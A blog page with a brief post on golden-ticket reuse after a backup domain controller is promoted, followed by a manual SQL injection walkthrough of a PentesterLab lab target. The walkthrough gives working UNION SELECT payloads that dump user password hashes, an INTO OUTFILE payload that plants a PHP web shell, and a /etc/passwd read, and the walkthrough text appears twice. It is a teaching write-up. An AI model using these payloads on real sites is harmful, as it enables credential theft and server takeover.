Monday, January 1, 2018
Windows Credential Attack - Part 3
In part 1 and 2, I wrote about passing the hash(PHH) and passing the ticket(PTT). This time, I will demonstrate how an attacker can still reuse a golden ticket even if you setup a 2nd DC (Domain Controller). It is common for admins to have more than 1 DC as a backup, in an event the primary is compromised, the BDC(Backup DC) is promoted to PDC. The assumption that this will remove the golden ticket. Unfortunately, that assumption is not right since the BDC will auto sync the AD objects and KDC from the PDC. In affect, BDC will inherit the KRBTGT from the Primary, thus, the golden ticket is transferred over. The video demo below illustrates how this happens seamlessly when a BDC is promoted as a PDC. We execute mimikatz on BDC and dump the LM hashes and reuse the KRBTGT ticket to gain psexec rights on another client PC that is authenticated to the same domain controller.
SQL Injection Walkthru (SQLi)
Most SQLi attacks are done using some form of 'hacker' tool. The common ones are sqlmap, sqlninja, bbqsql, etc. While using such tools are important, one must not forget the fundamentals of SQLi. In this post, I will demo the steps of identifying, enumerating and executing code on victim server 192.168.52.141. The victim server is running typical MySQL with php.
Identifying SQLi
Often, we start by inserting a ' in any user input fields we can find, if we are lucky, the server will display some errors, this means we have broken the SQL statement used to display the results.
The above diagram displays an SQL error indicating 2 single quotes, despite we added only 1. This usually means there is already a single quote used for the statement, a peak at the backend code looks like:
On line no 16, the var id and title already has single quotes, that means, if you added another single quote, it would mean the statement would be broken. This is unusual as most SQLi attacks start with a single quote followed by the payload. So always pay attention to the error msg. If you want to know if ' is required or not, first try to execute a logical syntax such as id=2-1, if you don't see an error and the return display is id=1, you know that SQLi is possible without the single quote mark ;-)
Lets proceed with enumeration of the SQL table.
Enumerate SQLi
This is where we must first find out how many columns the table has, we can do this by using the UNION SELECT statement. We need to match the number of columns with the query used. If you used sqlmap, this is what it automates for you :-)
So, by inserting the following statements:
http://192.168.52.141/cat.php?id=2 union select 1
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3,4
no error returned....see diagram below:
Code Exec
Now we can start rocking! Let's see what version, database and user MySQL is running. We can call MySQL built in functions such as @@version, database(), current_user().
Looks like it's running Debian Squeeze, now let's see the database name the contents are stored in:
Great! The db name is photoblog. Now, how aboout the userid mysqld is running:
From here, we already got code execution. Next step would be to exfiltrate the contents of the database 'photoblog'. There are some default tables in MySQL such as information_schema.table and information_schema.columns that contains very useful information:
http://192.168.52.141/cat.php?id=2 union select 1,table_name,3,4 from information_schema.tables
will return a complete set of tables in photoblog db:
The table 'users' is of particular interest to us :-) Let's see what we can find inside it by displaying the corresponding tablename:column name in each row using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(table_name,':',column_name),3,4 from information_schema.columns
Output:
Scrolling down the displayed output, the most obvious goodies are inside the 'users' table column 'login' and 'password'. Let's exfiltrate it using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(login,':',password),3,4 from users
Output:
Now we have exfiltrate the user 'admin with password '8efe310f9ab3efeae8d410a8e0166eb2'. Stick it inside your favourite password cracker and you for the admin password!
There you go folks...tools such as sqlmap can also spawn a shell, what it does is it writes a php file to the www root with simple php system call such as:
http://192.168.52.141/cat.php?id=2 union select 1,"<? system($_GET["cmd"]); ?>",3,4 INTO OUTFILE '/var/www/cmd.php'
Provided the userid 'pentesterlab@localhost' had privilege to write to /var/www/ you should be able to call the url directly to pass arguments. You can also try load_file('/etc/passwd'). If you are lucky, you should be able to see its contents.
That's pretty much how SQLi is done by hand. Remember, don't be a script kiddie, always understand how your code works!
Kudos, to www.pentesterlab.com for the educational content.
Identifying SQLi
Often, we start by inserting a ' in any user input fields we can find, if we are lucky, the server will display some errors, this means we have broken the SQL statement used to display the results.
The above diagram displays an SQL error indicating 2 single quotes, despite we added only 1. This usually means there is already a single quote used for the statement, a peak at the backend code looks like:
Lets proceed with enumeration of the SQL table.
Enumerate SQLi
This is where we must first find out how many columns the table has, we can do this by using the UNION SELECT statement. We need to match the number of columns with the query used. If you used sqlmap, this is what it automates for you :-)
So, by inserting the following statements:
http://192.168.52.141/cat.php?id=2 union select 1
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3,4
no error returned....see diagram below:
Code Exec
Now we can start rocking! Let's see what version, database and user MySQL is running. We can call MySQL built in functions such as @@version, database(), current_user().
Looks like it's running Debian Squeeze, now let's see the database name the contents are stored in:
Great! The db name is photoblog. Now, how aboout the userid mysqld is running:
http://192.168.52.141/cat.php?id=2 union select 1,table_name,3,4 from information_schema.tables
will return a complete set of tables in photoblog db:
The table 'users' is of particular interest to us :-) Let's see what we can find inside it by displaying the corresponding tablename:column name in each row using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(table_name,':',column_name),3,4 from information_schema.columns
Output:
Scrolling down the displayed output, the most obvious goodies are inside the 'users' table column 'login' and 'password'. Let's exfiltrate it using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(login,':',password),3,4 from users
Output:
Now we have exfiltrate the user 'admin with password '8efe310f9ab3efeae8d410a8e0166eb2'. Stick it inside your favourite password cracker and you for the admin password!
There you go folks...tools such as sqlmap can also spawn a shell, what it does is it writes a php file to the www root with simple php system call such as:
http://192.168.52.141/cat.php?id=2 union select 1,"<? system($_GET["cmd"]); ?>",3,4 INTO OUTFILE '/var/www/cmd.php'
Provided the userid 'pentesterlab@localhost' had privilege to write to /var/www/ you should be able to call the url directly to pass arguments. You can also try load_file('/etc/passwd'). If you are lucky, you should be able to see its contents.
That's pretty much how SQLi is done by hand. Remember, don't be a script kiddie, always understand how your code works!
Kudos, to www.pentesterlab.com for the educational content.
Subscribe to:
Comments (Atom)